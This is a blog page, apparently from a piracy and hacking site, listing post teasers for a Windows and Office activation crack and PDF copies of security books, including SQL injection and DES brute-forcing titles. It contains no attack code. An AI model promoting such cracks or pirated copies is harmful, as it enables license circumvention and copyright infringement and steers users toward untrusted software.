  • Microsoft Toolkit v2.4.4 Final "Windows 8 & Ms office 2013 activator" !! Crack
    Microsoft Toolkit Microsoft Toolkit v2.4.1 | FINAL  | Size 38 MB ================ [Software INFO:] ================ This is a set of tools a...
  • Brute Force Cracking the Data Encryption Standard !! Matt Curtin
    Brute Force Cracking the Data Encryption Standard Published: 2005 | ISBN10 0387201092 | 283 Pages | PDF |SIZE 2 MB Book Description In 1996,...
  • Geek House - 10 Hardware Hacking Projects for Around Home !! Barry Press
    Geek House - 10 Hardware Hacking Projects for Around Home Published: 2005 | ISBN10 0764579568 | 304 Pages | PDF |SIZE 6 MB Book Description ...
  • Syngress SQL Injection Attacks & Defense !! Justin Clarke
    Syngress SQL Injection Attacks & Defense Published: 2012 | 576 Pages | ISBN: 1597499633 | PDF | 10MB Book Description SQL Injection Atta...

Categories

  • book
  • coding
  • CRACKS
  • Game
  • hacking
  • Hacking Tutorials
  • Other
  • software
  • SOLUTIONS
  • Unlock Datacard
  • Utility
  • Virus

Blog Archive

  • ▼  2013 (23)
    • ▼  December (1)
      • LENOVO ONE KEY RECOVERY PROBLEM SOLUTION FOR WINDO...
    • ►  July (18)
    • ►  May (1)
    • ►  March (3)
  • ►  2012 (27)
    • ►  November (2)
    • ►  September (2)
    • ►  August (4)
    • ►  July (3)
    • ►  March (2)
    • ►  February (2)
    • ►  January (12)
Powered by Blogger.

About Me

Unknown
View my complete profile